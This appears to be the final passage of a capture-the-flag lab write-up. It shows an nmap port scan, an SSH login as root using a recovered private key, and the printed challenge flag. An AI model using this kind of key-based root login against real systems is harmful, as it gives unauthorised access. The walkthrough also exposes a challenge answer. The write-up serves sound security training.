SYN Stealth Scan Timing: About 97.35% done; ETC: 05:35 (0:00:02 remaining)
Nmap scan report for 172.23.0.4
Host is up (0.40s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE
2122/tcp open  caupc-remote

Nmap done: 1 IP address (1 host up) scanned in 72.71 seconds

The SSH service is running on port 2122. Now chmod 700 id_rsa at the end.

Login to the root user

ssh -i id_rsa root@172.23.0.4 -p 2122

We finally have the ssh access to the root user of the master node. Read the flag

-bash-4.1# cat flag10.txt 
THM{This.Just.Keeps.Getting.Sadder.And.Sadder}

Thank you for reading 👍

Last updated